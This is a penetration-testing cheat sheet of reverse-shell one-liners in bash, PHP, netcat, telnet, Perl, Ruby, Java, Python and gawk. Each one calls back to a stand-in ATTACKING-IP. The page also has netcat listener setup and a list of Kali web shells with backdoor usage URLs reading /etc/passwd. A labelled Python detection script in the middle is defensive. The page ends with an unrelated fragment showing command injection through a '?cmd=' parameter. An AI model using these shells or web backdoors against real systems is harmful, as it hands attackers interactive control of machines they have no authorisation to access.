During penetration testing if you’re lucky enough to find a remote command execution vulnerability, you’ll more often than not want to connect back to your attacking machine to leverage an interactive shell.
Below is a collection of reverse shells that use commonly installed programming languages or commonly installed binaries (nc, telnet, bash, etc). At the bottom of the post is a collection of uploadable reverse shells that ship with Kali Linux.
Setup Listening Netcat
Your remote shell will need a listening netcat instance in order to connect back.
Set your Netcat listening shell on an allowed port
Use a port that is likely allowed via outbound firewall rules on the target network, e.g. 80 / 443
To setup a listening netcat instance, enter the following:
root@kali:~# nc -nvlp 80
nc: listening on :: 80 ...
nc: listening on 0.0.0.0 80 ...
NAT requires a port forward
If your attacking machine is behind a NAT router, you’ll need to set up a port forward to the attacking machine's IP / port.
ATTACKING-IP is the machine running your listening netcat session, port 80 is used in all examples below (for reasons mentioned above).
Bash Reverse Shells
exec /bin/bash 0&0 2>&0

0<&196;exec 196<>/dev/tcp/ATTACKING-IP/80; sh <&196 >&196 2>&196

exec 5<>/dev/tcp/ATTACKING-IP/80
cat <&5 | while read line; do $line 2>&5 >&5; done

# or:
while read line 0<&5; do $line 2>&5 >&5; done

bash -i >& /dev/tcp/ATTACKING-IP/80 0>&1
PHP Reverse Shell
php -r '$sock=fsockopen("ATTACKING-IP",80);exec("/bin/sh -i <&3 >&3 2>&3");'
(Assumes TCP uses file descriptor 3. If it doesn't work, try 4, 5, or 6.)
Netcat Reverse Shell
nc -e /bin/sh ATTACKING-IP 80

/bin/sh | nc ATTACKING-IP 80

rm -f /tmp/p; mknod /tmp/p p && nc ATTACKING-IP 4444 0/tmp/p
Telnet Reverse Shell
rm -f /tmp/p; mknod /tmp/p p && telnet ATTACKING-IP 80 0/tmp/p

telnet ATTACKING-IP 80 | /bin/bash | telnet ATTACKING-IP 443
Remember to listen on 443 on the attacking machine also.
Perl Reverse Shell
perl -e 'use Socket;$i="ATTACKING-IP";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
Perl Windows Reverse Shell
perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"ATTACKING-IP:80");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

perl -e 'use Socket;$i="ATTACKING-IP";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
Ruby Reverse Shell
ruby -rsocket -e 'f=TCPSocket.open("ATTACKING-IP",80).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
Java Reverse Shell
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/ATTACKING-IP/80;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()
Python Reverse Shell
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ATTACKING-IP",80));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
Gawk Reverse Shell
#!/usr/bin/gawk -f

BEGIN {
    Port    =       8080
    Prompt  =       "bkd> "

    Service = "/inet/tcp/" Port "/0/0"
    while (1) {
        do {
            printf Prompt |& Service
            Service |& getline cmd
            if (cmd) {
                while ((cmd |& getline) > 0)
                    print $0 |& Service
                close(cmd)
            }
        } while (cmd != "exit")
        close(Service)
    }
}
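The one-liners in the sections above share a small number of recognisable shapes (the /dev/tcp pseudo-device, nc -e, the mknod named-pipe relay, fsockopen followed by exec, socket followed by dup2, and so on), which is what a detection engineer keys on when reviewing process-execution logs. The following Python is an added example, not part of the original cheat sheet: it encodes those shapes as rules and runs them over a constructed sample log. The rule names, the scan() helper and the 203.0.113.10 documentation address (standing in for ATTACKING-IP) are all assumptions made here.

```python
import re

# Detection rules for the reverse-shell families listed on this page. Each regex is
# written against the visible shape of the corresponding one-liner.
RULES = [
    ("bash /dev/tcp", re.compile(r"/dev/tcp/\S+/\d+")),
    ("netcat -e", re.compile(r"\bnc(?:at)?\b.*\s-e\s+\S*sh\b")),
    ("shell piped to nc/telnet", re.compile(r"/bin/(?:ba)?sh\s*\|\s*(?:nc|telnet)\b")),
    ("named-pipe relay", re.compile(r"mknod\s+\S+\s+p\b.*\b(?:nc|telnet)\b")),
    ("php fsockopen", re.compile(r"fsockopen\(.*exec\(")),
    ("perl Socket", re.compile(r"use Socket;.*open\(STDIN,\">&S\"\)|IO::Socket::INET.*fdopen")),
    ("ruby TCPSocket", re.compile(r"TCPSocket\.open\(.*exec\b")),
    ("python socket+dup2", re.compile(r"socket\.socket\(.*dup2\(")),
    ("gawk /inet/tcp", re.compile(r"/inet/tcp/")),
]


def classify(cmdline):
    """Return the names of every rule that matches one process command line."""
    return [name for name, rx in RULES if rx.search(cmdline)]


def scan(lines):
    """Scan an iterable of command lines; return (line_no, families, cmdline) per hit."""
    hits = []
    for n, line in enumerate(lines, 1):
        fams = classify(line)
        if fams:
            hits.append((n, fams, line))
    return hits


# Constructed sample of command lines as a process-execution log might record them;
# 203.0.113.10 is a documentation address standing in for the page's ATTACKING-IP.
SAMPLE_LOG = [
    "bash -i >& /dev/tcp/203.0.113.10/80 0>&1",
    "php -r '$sock=fsockopen(\"203.0.113.10\",80);exec(\"/bin/sh -i <&3 >&3 2>&3\");'",
    "python -c 'import socket,os;s=socket.socket();s.connect((\"203.0.113.10\",80));os.dup2(s.fileno(),0)'",
    "rm -f /tmp/p; mknod /tmp/p p && telnet 203.0.113.10 80",
    "nc -nvlp 80",                          # a listener on the analyst's own host, not a callback
    "curl -s https://example.com/health",   # benign outbound traffic on an allowed port
]

if __name__ == "__main__":
    for n, fams, line in scan(SAMPLE_LOG):
        print(f"line {n}: {', '.join(fams)} :: {line}")
```

Because these shells deliberately use ports that egress filtering allows (80, 443), matching on the command line or the shell's use of /dev/tcp is more reliable than matching on destination port alone.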
Kali Web Shells
The following shells exist within Kali Linux under /usr/share/webshells/; they are only useful if you are able to upload, inject or transfer the shell to the target machine.
Kali PHP Web Shells
COMMAND | DESCRIPTION
---|---
/usr/share/webshells/php/ | Pen Test Monkey – PHP Reverse Shell
/usr/share/webshells/ /usr/share/webshells/ | Pen Test Monkey, Findsock Shell. Build with gcc -o findsock findsock.c (be mindful of the target server's architecture); execute with netcat, not a browser: nc -v target 80
/usr/share/webshells/ | PHP backdoor, useful for CMD execution if upload / code injection is possible. Usage: http://target.com/simple-
/usr/share/webshells/ | Larger PHP shell, with a text input box for command execution.
Tip: Executing Reverse Shells
The last two shells above are not reverse shells; however, they can be useful for launching a reverse shell.
Kali Perl Reverse Shell
COMMAND | DESCRIPTION
---|---
/usr/share/webshells/perl/ | Pen Test Monkey – Perl Reverse Shell
/usr/share/webshells/ | Pen Test Monkey, Perl Shell. Usage: http://target.com/perlcmd.cgi?cat /etc/passwd
Kali Cold Fusion Shell
COMMAND | DESCRIPTION
---|---
/usr/share/webshells/cfm/cfexec.cfm | Cold Fusion Shell – aka CFM Shell
Kali ASP Shell
COMMAND | DESCRIPTION
---|---
/usr/share/webshells/asp/ | Kali ASP Shells
Kali ASPX Shells
COMMAND | DESCRIPTION
---|---
/usr/share/webshells/aspx/ | Kali ASPX Shells
Kali JSP Reverse Shell
COMMAND | DESCRIPTION
---|---
/usr/share/webshells/jsp/jsp-reverse.jsp | Kali JSP Reverse Shell
You might want to read:
1- Kali Linux Hackers Cheat Sheet https://www.ethicalhackx.com/kali-linux-hacking-commands-list
At this point, I thought about trying to use some programming languages to do the shell connection. Python was unfortunately not installed on the machine (192.168.209.144:8080/phptax/data/ourcode.php?cmd=which python) but Perl actually existed (192.168.209.144:8080/phptax/data/ourcode.php?cmd=which perl), so by having this Perl reverse shell snippet from ethicalhackx: